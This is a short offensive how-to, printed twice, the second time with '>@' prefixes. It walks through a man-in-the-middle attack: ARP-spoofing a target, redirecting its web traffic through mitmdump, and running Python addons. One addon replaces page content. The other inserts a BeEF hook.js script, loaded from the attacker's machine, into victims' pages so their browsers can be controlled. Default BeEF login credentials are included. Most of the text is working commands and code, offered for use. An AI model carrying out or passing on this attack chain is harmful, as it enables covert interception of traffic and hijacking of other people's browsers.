MITMDdump is the command-line companion to MITMProxy. It provides tcpdump-like functionality to 
let you view, record, and programmatically transform HTTP traffic. See the --help flag output for 
complete documentation.

0. Prerequisites
  -Make an ARP spoofing attack with the gateway (see howto-0032-arpspoof-arp-spoofing.txt).
  -Configure iptables to redirect ports 80 and 443 to 8080 (see howto-0034-mitmproxy-http-proxy.txt.

-> how to use MITMDump
1. Create a python file (simpleresponse.py):
---
from mitmproxy import ctx
from mitmproxy import http

def response(flow: http.HTTPFlow):
    flow.response.content=bytes("ENCORE HACHED", "UTF-8")
    ctx.log.info("REPONSE ENVOYEE")
---

2. Start the ARP spoofing.
$ sudo arpspoof -i eth0 -t <target IP addr> -r <gw IP addr>

3. Start the interception command.
$ sudo mitmdump -s simplereponse.py --mode transparent --listen-host <kali ip> --anticache
>>> kali intercepts lets and executes the python prog as a response.

BONUS: see invert.py and hackedcroft.py in the resources directory.


4. We can also use Beef to go further.
Start Beef:
$ cd ~/Document/beef
$ ./beef

Enter [ 127.0.0.1/ui/panel ] into Firefox then use [beef/tannen] a credentials.

Create a new injection Pyhton code.
Script (injection.py):
---
from mitmproxy import ctx
from mitmproxy import http

def response(flow: http.HTTPFlow):
	reflector = bytes("<script src='http://<kali ip>:3000/hook.js'></script>", "UTF-8")
	flow.response.content = flow.response.content.replace(b"<head>", reflector)
---

Lanch the injection with mitmdump.
$ sudo mitmdump -s injection.py --mode transparent --listen-host <ip_kali> --anticache

Into Beef, the PC appears under Online browser.

Click on the IP and go to Commands.
>>> Have fun !
>@
>@######################################################################################################
>@#                                                                                                    #
>@# [ MITMDdump ]                                                                                      #
>@#                                                                                                    #
>@# MITMDdump is the command-line companion to MITMProxy. It provides tcpdump-like functionality to    #
>@# let you view, record, and programmatically transform HTTP traffic. See the --help flag output for  #
>@# complete documentation.                                                                            #
>@#                                                                                                    #
>@# See: howto-0032-arpspoof-arp-spoofing.txt                                                          #
>@# See: howto-0034-mitmproxy-http-proxy.txt                                                           # 
>@#                                                                                                    #
>@######################################################################################################
>@
>@
>@-> how to use MITMDump
>@
>@0. Prerequisites
>@  -Make an ARP spoofing attack with the gateway (see howto-0032-arpspoof-arp-spoofing.txt).
>@  -Configure iptables to redirect ports 80 and 443 to 8080 (see howto-0034-mitmproxy-http-proxy.txt.
>@
>@1. Create a python file (simpleresponse.py):
>@---
>@from mitmproxy import ctx
>@from mitmproxy import http
>@
>@def response(flow: http.HTTPFlow):
>@    flow.response.content=bytes("ENCORE HACHED", "UTF-8")
>@    ctx.log.info("REPONSE ENVOYEE")
>@---
>@
>@2. Start the ARP spoofing.
>@$ sudo arpspoof -i eth0 -t <target IP addr> -r <gw IP addr>
>@
>@3. Start the interception command.
>@$ sudo mitmdump -s simplereponse.py --mode transparent --listen-host <kali ip> --anticache
>@>>> kali intercepts and executes the python prog as a response.
>@
>@BONUS: see invert.py and hackedcroft.py in the resources directory.
>@
>@
>@4. We can also use Beef to go further.
>@Start Beef:
>@$ cd ~/Document/beef
>@$ ./beef
>@
>@Enter [ 127.0.0.1/ui/panel ] into Firefox then use [beef/tannen] a credentials.
>@
>@Create a new injection Pyhton code.
>@Script (injection.py):
>@---
>@from mitmproxy import ctx
>@from mitmproxy import http
>@
>@def response(flow: http.HTTPFlow):
>@	reflector = bytes("<script src='http://<kali ip>:3000/hook.js'></script>", "UTF-8")
>@	flow.response.content = flow.response.content.replace(b"<head>", reflector)
>@---
>@
>@Lanch the injection with mitmdump.
>@$ sudo mitmdump -s injection.py --mode transparent --listen-host <ip_kali> --anticache
>@
>@Into Beef, the PC appears under Online browser.
>@
>@Click on the IP and go to Commands.
>@>>> Have fun !
>@
>@######################################################################################################
>@
